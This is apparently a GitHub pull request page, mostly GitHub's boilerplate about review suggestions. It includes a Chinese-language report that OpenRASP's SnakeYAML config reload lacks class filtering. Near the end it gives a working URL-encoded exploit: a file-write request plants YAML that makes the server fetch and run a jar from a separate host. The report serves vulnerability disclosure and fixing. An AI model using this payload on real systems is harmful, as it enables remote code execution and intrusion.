Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
中文说明: 提交你的代码
snakeyaml没有做好类过滤, . 如果应用存在任意文件写漏洞, 可以直接写exp到rasp/conf/openrasp.yml下, openrasp会自动重新加载配置, 执行yml反序列, 然后导致RCE.
yml payload
可以直接拿openrasp-testcase作为靶场, 使用以下url即可让openrasp加载外部jar包
http://127.0.0.1:8080/vulns/005-file-write.jsp?filename=../../rasp/conf/openrasp.yml&filedata=%27123%27%3A%20%21%21javax.script.ScriptEngineManager%20%5B%21%21java.net.URLClassLoader%20%5B%5B%20%21%21java.net.URL%20%5B%22http%3A//127.0.0.1%3A2334/exp-8.jar%22%5D%5D%5D%5D